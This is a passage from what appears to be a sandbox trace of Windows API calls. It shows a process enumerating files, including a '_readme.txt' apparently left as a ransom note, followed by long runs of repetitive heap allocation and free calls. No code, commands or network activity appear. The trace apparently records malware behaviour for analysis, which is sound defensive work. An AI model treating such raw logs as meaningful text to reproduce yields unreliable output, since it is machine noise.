ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.805] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e609d00, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e609d00, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e62fe60, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.805] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e609d00, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e609d00, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e62fe60, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.805] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.805] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 